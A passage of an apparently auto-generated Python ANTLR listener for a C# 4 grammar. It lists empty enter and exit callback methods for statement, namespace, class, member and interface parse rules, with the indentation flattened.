pass
# Enter a parse tree produced by CSharp4Parser#for_statement.
def enterFor_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#for_statement.
def exitFor_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#for_initializer.
def enterFor_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#for_initializer.
def exitFor_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#for_condition.
def enterFor_condition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#for_condition.
def exitFor_condition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#for_iterator.
def enterFor_iterator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#for_iterator.
def exitFor_iterator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#statement_expression_list.
def enterStatement_expression_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#statement_expression_list.
def exitStatement_expression_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#foreach_statement.
def enterForeach_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#foreach_statement.
def exitForeach_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#jump_statement.
def enterJump_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#jump_statement.
def exitJump_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#break_statement.
def enterBreak_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#break_statement.
def exitBreak_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#continue_statement.
def enterContinue_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#continue_statement.
def exitContinue_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#goto_statement.
def enterGoto_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#goto_statement.
def exitGoto_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#return_statement.
def enterReturn_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#return_statement.
def exitReturn_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#throw_statement.
def enterThrow_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#throw_statement.
def exitThrow_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#try_statement.
def enterTry_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#try_statement.
def exitTry_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#catch_clauses.
def enterCatch_clauses(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#catch_clauses.
def exitCatch_clauses(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#specific_catch_clauses.
def enterSpecific_catch_clauses(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#specific_catch_clauses.
def exitSpecific_catch_clauses(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#specific_catch_clause.
def enterSpecific_catch_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#specific_catch_clause.
def exitSpecific_catch_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#general_catch_clause.
def enterGeneral_catch_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#general_catch_clause.
def exitGeneral_catch_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#finally_clause.
def enterFinally_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#finally_clause.
def exitFinally_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#checked_statement.
def enterChecked_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#checked_statement.
def exitChecked_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unchecked_statement.
def enterUnchecked_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unchecked_statement.
def exitUnchecked_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#lock_statement.
def enterLock_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#lock_statement.
def exitLock_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#using_statement.
def enterUsing_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#using_statement.
def exitUsing_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#resource_acquisition.
def enterResource_acquisition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#resource_acquisition.
def exitResource_acquisition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#yield_statement.
def enterYield_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#yield_statement.
def exitYield_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#compilation_unit.
def enterCompilation_unit(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#compilation_unit.
def exitCompilation_unit(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_declaration.
def enterNamespace_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_declaration.
def exitNamespace_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#qualified_identifier.
def enterQualified_identifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#qualified_identifier.
def exitQualified_identifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_body.
def enterNamespace_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_body.
def exitNamespace_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#extern_alias_directives.
def enterExtern_alias_directives(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#extern_alias_directives.
def exitExtern_alias_directives(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#extern_alias_directive.
def enterExtern_alias_directive(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#extern_alias_directive.
def exitExtern_alias_directive(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#using_directives.
def enterUsing_directives(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#using_directives.
def exitUsing_directives(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#using_directive.
def enterUsing_directive(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#using_directive.
def exitUsing_directive(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#using_alias_directive.
def enterUsing_alias_directive(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#using_alias_directive.
def exitUsing_alias_directive(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#using_namespace_directive.
def enterUsing_namespace_directive(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#using_namespace_directive.
def exitUsing_namespace_directive(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_member_declarations.
def enterNamespace_member_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_member_declarations.
def exitNamespace_member_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_member_declaration.
def enterNamespace_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_member_declaration.
def exitNamespace_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_declaration.
def enterType121_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_declaration.
def exitType121_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#qualified_alias_member.
def enterQualified_alias_member(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#qualified_alias_member.
def exitQualified_alias_member(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_declaration.
def enterClass_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_declaration.
def exitClass_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_modifiers.
def enterClass_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_modifiers.
def exitClass_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_modifier.
def enterClass_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_modifier.
def exitClass_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_parameter_list.
def enterType121_parameter_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_parameter_list.
def exitType121_parameter_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_parameters.
def enterType121_parameters(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_parameters.
def exitType121_parameters(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_parameter.
def enterType121_parameter(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_parameter.
def exitType121_parameter(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_base.
def enterClass_base(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_base.
def exitClass_base(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_type121_list.
def enterInterface_type121_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_type121_list.
def exitInterface_type121_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_parameter_constraints_clauses.
def enterType121_parameter_constraints_clauses(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_parameter_constraints_clauses.
def exitType121_parameter_constraints_clauses(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_parameter_constraints_clause.
def enterType121_parameter_constraints_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_parameter_constraints_clause.
def exitType121_parameter_constraints_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_parameter_constraints.
def enterType121_parameter_constraints(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_parameter_constraints.
def exitType121_parameter_constraints(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#primary_constraint.
def enterPrimary_constraint(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#primary_constraint.
def exitPrimary_constraint(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#secondary_constraints.
def enterSecondary_constraints(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#secondary_constraints.
def exitSecondary_constraints(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_constraint.
def enterConstructor_constraint(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_constraint.
def exitConstructor_constraint(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_body.
def enterClass_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_body.
def exitClass_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_member_declarations.
def enterClass_member_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_member_declarations.
def exitClass_member_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_member_declaration.
def enterClass_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_member_declaration.
def exitClass_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#all_member_modifiers.
def enterAll_member_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#all_member_modifiers.
def exitAll_member_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#all_member_modifier.
def enterAll_member_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#all_member_modifier.
def exitAll_member_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#common_member_declaration.
def enterCommon_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#common_member_declaration.
def exitCommon_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121d_member_declaration.
def enterType121d_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121d_member_declaration.
def exitType121d_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constant_declarators.
def enterConstant_declarators(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constant_declarators.
def exitConstant_declarators(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constant_declarator.
def enterConstant_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constant_declarator.
def exitConstant_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variable_declarators.
def enterVariable_declarators(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variable_declarators.
def exitVariable_declarators(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variable_declarator.
def enterVariable_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variable_declarator.
def exitVariable_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variable_initializer.
def enterVariable_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variable_initializer.
def exitVariable_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_declaration.
def enterMethod_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_declaration.
def exitMethod_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_header.
def enterMethod_header(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_header.
def exitMethod_header(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_modifiers.
def enterMethod_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_modifiers.
def exitMethod_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_modifier.
def enterMethod_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_modifier.
def exitMethod_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#return_type121.
def enterReturn_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#return_type121.
def exitReturn_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_name.
def enterMember_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_name.
def exitMember_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_body.
def enterMethod_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_body.
def exitMethod_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#formal_parameter_list.
def enterFormal_parameter_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#formal_parameter_list.
def exitFormal_parameter_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_parameters.
def enterFixed_parameters(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_parameters.
def exitFixed_parameters(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_parameter.
def enterFixed_parameter(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_parameter.
def exitFixed_parameter(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#default_argument.
def enterDefault_argument(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#default_argument.
def exitDefault_argument(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#parameter_modifier.
def enterParameter_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#parameter_modifier.
def exitParameter_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#parameter_array.
def enterParameter_array(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#parameter_array.
def exitParameter_array(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#property_declaration.
def enterProperty_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#property_declaration.
def exitProperty_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#property_modifiers.
def enterProperty_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#property_modifiers.
def exitProperty_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#property_modifier.
def enterProperty_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#property_modifier.
def exitProperty_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#accessor_declarations.
def enterAccessor_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#accessor_declarations.
def exitAccessor_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#get_accessor_declaration.
def enterGet_accessor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#get_accessor_declaration.
def exitGet_accessor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#set_accessor_declaration.
def enterSet_accessor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#set_accessor_declaration.
def exitSet_accessor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#accessor_modifier.
def enterAccessor_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#accessor_modifier.
def exitAccessor_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#accessor_body.
def enterAccessor_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#accessor_body.
def exitAccessor_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#event_declaration.
def enterEvent_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#event_declaration.
def exitEvent_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#event_modifiers.
def enterEvent_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#event_modifiers.
def exitEvent_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#event_modifier.
def enterEvent_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#event_modifier.
def exitEvent_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#event_accessor_declarations.
def enterEvent_accessor_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#event_accessor_declarations.
def exitEvent_accessor_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#add_accessor_declaration.
def enterAdd_accessor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#add_accessor_declaration.
def exitAdd_accessor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#remove_accessor_declaration.
def enterRemove_accessor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#remove_accessor_declaration.
def exitRemove_accessor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_declaration.
def enterIndexer_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_declaration.
def exitIndexer_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_modifiers.
def enterIndexer_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_modifiers.
def exitIndexer_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_modifier.
def enterIndexer_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_modifier.
def exitIndexer_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_declarator.
def enterIndexer_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_declarator.
def exitIndexer_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_declaration.
def enterOperator_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_declaration.
def exitOperator_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_modifiers.
def enterOperator_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_modifiers.
def exitOperator_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_modifier.
def enterOperator_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_modifier.
def exitOperator_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_declarator.
def enterOperator_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_declarator.
def exitOperator_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unary_operator_declarator.
def enterUnary_operator_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unary_operator_declarator.
def exitUnary_operator_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#overloadable_unary_operator.
def enterOverloadable_unary_operator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#overloadable_unary_operator.
def exitOverloadable_unary_operator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#binary_operator_declarator.
def enterBinary_operator_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#binary_operator_declarator.
def exitBinary_operator_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#overloadable_binary_operator.
def enterOverloadable_binary_operator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#overloadable_binary_operator.
def exitOverloadable_binary_operator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#overloadable_operator.
def enterOverloadable_operator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#overloadable_operator.
def exitOverloadable_operator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#conversion_operator_declarator.
def enterConversion_operator_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#conversion_operator_declarator.
def exitConversion_operator_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_body.
def enterOperator_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_body.
def exitOperator_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_declaration.
def enterConstructor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_declaration.
def exitConstructor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_modifiers.
def enterConstructor_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_modifiers.
def exitConstructor_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_modifier.
def enterConstructor_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_modifier.
def exitConstructor_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_declarator.
def enterConstructor_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_declarator.
def exitConstructor_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_initializer.
def enterConstructor_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_initializer.
def exitConstructor_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_body.
def enterConstructor_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_body.
def exitConstructor_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_declaration.
def enterStatic_constructor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_declaration.
def exitStatic_constructor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_modifiers.
def enterStatic_constructor_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_modifiers.
def exitStatic_constructor_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_body.
def enterStatic_constructor_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_body.
def exitStatic_constructor_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_declaration.
def enterDestructor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_declaration.
def exitDestructor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_body.
def enterDestructor_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_body.
def exitDestructor_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#body.
def enterBody(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#body.
def exitBody(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_declaration.
def enterStruct_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_declaration.
def exitStruct_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_modifiers.
def enterStruct_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_modifiers.
def exitStruct_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_modifier.
def enterStruct_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_modifier.
def exitStruct_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_interfaces.
def enterStruct_interfaces(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_interfaces.
def exitStruct_interfaces(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_body.
def enterStruct_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_body.
def exitStruct_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_member_declarations.
def enterStruct_member_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_member_declarations.
def exitStruct_member_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_member_declaration.
def enterStruct_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_member_declaration.
def exitStruct_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#array_type121.
def enterArray_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#array_type121.
def exitArray_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#non_array_type121.
def enterNon_array_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#non_array_type121.
def exitNon_array_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#rank_specifiers.
def enterRank_specifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#rank_specifiers.
def exitRank_specifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#rank_specifier.
def enterRank_specifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#rank_specifier.
def exitRank_specifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#dim_separators.
def enterDim_separators(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#dim_separators.
def exitDim_separators(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#array_initializer.
def enterArray_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#array_initializer.
def exitArray_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variable_initializer_list.
def enterVariable_initializer_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variable_initializer_list.
def exitVariable_initializer_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_declaration.
def enterInterface_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_declaration.
def exitInterface_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_modifiers.
def enterInterface_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_modifiers.
def exitInterface_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_modifier.
def enterInterface_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_modifier.
def exitInterface_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variant_type121_parameter_list.
def enterVariant_type121_parameter_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variant_type121_parameter_list.
def exitVariant_type121_parameter_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variant_type121_parameters.
def enterVariant_type121_parameters(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variant_type121_parameters.
def exitVariant_type121_parameters(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variance_annotation.
def enterVariance_annotation(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variance_annotation.
def exitVariance_annotation(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_base.
def enterInterface_base(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_base.
def exitInterface_base(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_body.
def enterInterface_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_body.
def exitInterface_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_member_declarations.
def enterInterface_member_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_member_declarations.
def exitInterface_member_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_member_declaration.
def enterInterface_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_member_declaration.
def exitInterface_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_method_declaration.
def enterInterface_method_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_method_declaration.
def exitInterface_method_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_property_declaration.
def enterInterface_property_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_property_declaration.
def exitInterface_property_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_accessors.
def enterInterface_accessors(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_accessors.
def exitInterface_accessors(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_event_declaration.
def enterInterface_event_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_event_declaration.
def exitInterface_event_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_indexer_declaration.
def enterInterface_indexer_declaration(self, ctx):
pass
